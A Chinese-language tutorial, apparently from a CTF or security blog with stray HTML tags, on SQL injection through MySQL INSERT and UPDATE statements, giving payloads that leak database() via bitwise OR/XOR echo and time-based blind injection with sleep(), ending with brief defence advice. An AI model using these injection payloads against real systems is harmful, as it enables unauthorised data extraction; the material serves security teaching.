Insert和Update型SQL注入技术详解<\/h1>

一、有回显注入技术<\/h2>

1. 整型注入点利用<\/h3>

按位或运算(|)利用<\/h4>
当拼接值为0时，可使用按位或运算显示查询数据<\/li> <\/ul>
insert<\/span> into<\/span> ctf values<\/span> (0<\/span> |<\/span> (select<\/span> hex(database<\/span>())),'0'<\/span>,'test'<\/span>,'0'<\/span>);
<\/span><\/span><\/code><\/pre>
查询结果会显示十六进制值，需使用unhex()<\/code>函数转换<\/li>
<\/ul>
select<\/span> unhex(74657374<\/span>);  -- 输出'test'
<\/span><\/span><\/span><\/code><\/pre>按位异或运算(^)利用<\/h4>

当拼接值非0时(如100)，可使用按位异或运算<\/li>
<\/ul>
insert<\/span> into<\/span> ctf values<\/span> (100<\/span> ^<\/span> (select<\/span> hex(database<\/span>())),'0'<\/span>,'test'<\/span>,'0'<\/span>);
<\/span><\/span><\/code><\/pre>
需要再次异或才能恢复原始数据<\/li>
<\/ul>
select<\/span> unhex(100<\/span>^<\/span>74657338<\/span>);  -- 输出'test'
<\/span><\/span><\/span><\/code><\/pre>2. 字符型注入点利用<\/h3>
按位或运算(|)利用<\/h4>
insert<\/span> into<\/span> ctf values<\/span> (100<\/span> ,'0'<\/span>|<\/span> (select<\/span> hex(database<\/span>())) ,'test'<\/span>,'0'<\/span>);
<\/span><\/span><\/code><\/pre>按位异或运算(^)利用<\/h4>
insert<\/span> into<\/span> ctf values<\/span> (100<\/span> ,'100'<\/span> ^<\/span> (select<\/span> hex(database<\/span>())) ,'test'<\/span>,'0'<\/span>);
<\/span><\/span><\/code><\/pre>3. 注意事项<\/h3>

当查询结果大于MySQL bigint最大值(9223372036854775807)时，需使用substr<\/code>等函数分段获取<\/li>
其他可逆运算符：+<\/code>, -<\/code>, *<\/code>, \/<\/code>也可用于数据回显<\/li>
逻辑运算符(or<\/code>, ||<\/code>, xor<\/code>, &&<\/code>, and<\/code>)不能用于数据回显注入<\/li>
<\/ul>
二、时间盲注技术<\/h2>
1. 整型注入点利用<\/h3>
逻辑运算符使用<\/h4>

and<\/code>\/&&<\/code>：前面int值不能为0<\/li>
or<\/code>\/||<\/code>：前面int值不能为1<\/li>
xor<\/code>：对前面int值无要求（推荐使用）<\/li>
<\/ul>
insert<\/span> into<\/span> ctf values<\/span> (0<\/span> &&<\/span> sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>);  -- 不延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (1<\/span> &&<\/span> sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>);  -- 延时2秒
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span> ||<\/span> sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>);  -- 延时2秒
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (1<\/span> ||<\/span> sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>);  -- 不延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span> xor sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>); -- 延时2秒
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (1<\/span> xor sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>); -- 延时2秒
<\/span><\/span><\/span><\/code><\/pre>四则运算使用<\/h4>
insert<\/span> into<\/span> ctf values<\/span> (0<\/span>+<\/span>sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>);  -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>-<\/span>sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>);  -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>*<\/span>sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>);  -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>\/<\/span>sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>);  -- 延时
<\/span><\/span><\/span><\/code><\/pre>位运算使用<\/h4>
insert<\/span> into<\/span> ctf values<\/span> (0<\/span>&<\/span>sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>);  -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>|<\/span>sleep(2<\/span>),'test'<\/span>,'test'<\/span>,'0'<\/span>);  -- 延时
<\/span><\/span><\/span><\/code><\/pre>2. 字符型注入点利用<\/h3>

可用运算符：or<\/code>, ||<\/code>, xor<\/code>, |<\/code>, &<\/code>, +<\/code>, -<\/code>, *<\/code>, \/<\/code><\/li>
字符型在逻辑运算时会被当做0，不能使用&&<\/code>和and<\/code><\/li>
<\/ul>
insert<\/span> into<\/span> ctf values<\/span> (0<\/span>,'test'<\/span> ||<\/span> sleep(2<\/span>),'test'<\/span>,'0'<\/span>);  -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>,'test'<\/span>or<\/span> sleep(2<\/span>),'test'<\/span>,'0'<\/span>);   -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>,'test'<\/span>xor sleep(2<\/span>),'test'<\/span>,'0'<\/span>);  -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>,'test'<\/span>|<\/span> sleep(2<\/span>),'test'<\/span>,'0'<\/span>);    -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>,'test'<\/span>&<\/span> sleep(2<\/span>),'test'<\/span>,'0'<\/span>);   -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>,'test'<\/span>+<\/span> sleep(2<\/span>),'test'<\/span>,'0'<\/span>);   -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>,'test'<\/span>-<\/span> sleep(2<\/span>),'test'<\/span>,'0'<\/span>);   -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>,'test'<\/span>*<\/span> sleep(2<\/span>),'test'<\/span>,'0'<\/span>);   -- 延时
<\/span><\/span><\/span><\/span>insert<\/span> into<\/span> ctf values<\/span> (0<\/span>,'test'<\/span>\/<\/span> sleep(2<\/span>),'test'<\/span>,'0'<\/span>);   -- 延时
<\/span><\/span><\/span><\/code><\/pre>三、技术总结<\/h2>


有回显注入<\/strong>：<\/p>

优先使用按位运算(|<\/code>, ^<\/code>)<\/li>
大数值需分段获取<\/li>
注意数据类型(整型\/字符型)选择合适的运算符<\/li>
<\/ul>
<\/li>

时间盲注<\/strong>：<\/p>

整型点：推荐使用xor<\/code>或四则运算<\/li>
字符型点：避免使用&&<\/code>和and<\/code><\/li>
所有运算符都能触发延时，但需注意前置条件<\/li>
<\/ul>
<\/li>

防御建议<\/strong>：<\/p>

使用参数化查询<\/li>
对用户输入进行严格过滤<\/li>
避免直接拼接SQL语句<\/li>
设置数据库用户最小权限<\/li>
<\/ul>
<\/li>
<\/ol>